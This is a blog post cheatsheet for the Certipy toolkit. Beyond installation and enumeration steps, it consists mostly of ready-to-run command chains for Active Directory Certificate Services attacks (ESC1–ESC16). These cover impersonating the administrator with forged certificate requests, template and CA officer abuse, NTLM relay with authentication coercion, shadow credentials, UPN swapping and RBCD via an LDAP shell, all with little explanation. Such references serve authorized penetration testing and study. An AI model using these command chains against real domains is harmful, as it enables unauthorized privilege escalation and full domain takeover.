Post

Certipy Cheatsheet

Posted
Preview Image
By
4 min read
Certipy Cheatsheet

Certipy - AD CS Attack & Enumeration Toolkit

Installation

Certipy

Using pip

$ sudo apt update && sudo apt install -y python3 python3-pip $ python3 -m venv certipy-venv $ source certipy-venv/bin/activate $ pip install certipy-ad

Using pipx

$ pipx install -f "git+https://github.com/ly4k/Certipy.git"

Using uv

$ uv tool install git+https://github.com/ly4k/Certipy --force

Enumeration

Search for vulnerable certificate templates

$ certipy find -u username -p password -dc-ip ip -target dc -enabled -vulnerable -stdout

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

$ nxc ldap target -u username -p password -M adcs

Anonymously uses RPC endpoints to hunt for ADCS CAs

$ nxc smb target -M enum_ca

Attacks

ESC1

$ impacket-addcomputer domain/username:password -computer-name computer_name -computer-pass computer_password $ certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip

Or

$ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip If you run certipy and see Minimum RSA Key Length : 4096, you may need to provide the -key-size 4096 option $ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096 $ certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip $ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -sid <administrator sid> -dc-ip ip

ESC3

$ certipy req -u username -p password -ca ca -target domain -template template $ certipy req username -p password -ca ca -target domain -template User -on-behalf-of administrator -pfx pfx_file $ certipy auth -pfx administrator.pfx -dc-ip ip

ESC4

$ certipy template -u username@domain -p password -template template -write-default-configuration -no-save $ certipy req -u username@domain -p password -ca ca -template template -upn administrator@domain $ certipy auth -pfx administrator.pfx -dc-ip ip

ESC7

$ certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip $ certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip $ certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain $ certipy ca -ca ca -issue-request request_ID -u username@domain -p password $ certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID $ certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip

ESC8

$ ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server $ coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue $ certipy auth -pfx administrator.pfx

ESC9

$ certipy shadow auto -u username@domain -hashes :hash -account target_username $ certipy account update -u username@domain -hashes :hash -user target_username -upn administrator $ certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target dc_ip $ certipy account update -u username@domain -hashes :hash -user target_username -upn target_username $ certipy auth -pfx administrator.pfx -domain domain

ESC10

Enumeration

$ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc' -Name StrongCertificateBindingEnforcement $ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel' -Name CertificateMappingMethods

Exploitation

Case 2

$ certipy account -u username@domain -p password -dc-ip ip -target dc -upn dc$@domain -user victim update $ impacket-getTGT domain/victim:password -dc-ip ip $ export KRB5CCNAME=victim.ccache $ certipy req -k -dc-ip ip -target dc -ca ca -template User $ certipy account -k -dc-ip ip -target dc -upn victim@domain -user victim update $ certipy auth -pfx dc.pfx -dc-ip ip -ldap-shell # whoami u:DOMAIN\DC$ # set_rbcd DC$ Machine_Account$

ESC13

$ certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip $ certipy auth -pfx file.pfx -dc-ip ip

ESC14

ADCS ESC14 Abuse Technique

$ bloodyAD --host dc -d domain -u username -p password set object target altSecurityIdentities -v 'X509:<RFC822>target@domain' $ bloodyAD --host dc -d domain -u owned_user -p password set object target mail -v target@domain $ certipy account update -u owned_user@domain -p password -user username -upn target $ certipy req -u username -p password -ca ca -template template -dc-ip ip $ certipy account update -u owned_user -p password -user username -upn username@domain -dc-ip ip $ certipy auth -pfx pfx -dc-ip ip -user target -domain domain

ESC15

Scenario A

$ certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template template -upn administrator@domain -sid <administrator sid> -application-policies 'Client Authentication' $ certipy auth -pfx administrator.pfx -dc-ip ip -ldap-shell

Scenario B

$ certipy req -u username@domain -p password -dc-ip ip -ca ca -template WebServer -application-policies 'Certificate Request Agent' $ certipy req -u username@domain -p password -dc-ip ip -ca ca -template User -pfx user.pfx -on-behalf-of 'DOMAIN\Administrator' $ certipy auth -pfx administrator.pfx -dc-ip ip

ESC16

We use a user that has GenericAll or GenericWrite

$ certipy account -u owned_user@domain -p password -dc-ip ip -upn administrator -user username update $ certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template User -upn administrator@domain -sid <administrator sid> $ certipy account -u owned_user@domain -p password -dc-ip ip -upn username -user username update $ certipy auth -pfx administrator.pfx -dc-ip ip -domain domain
CheetSheets
certipy
This post is licensed under CC BY 4.0 by the author.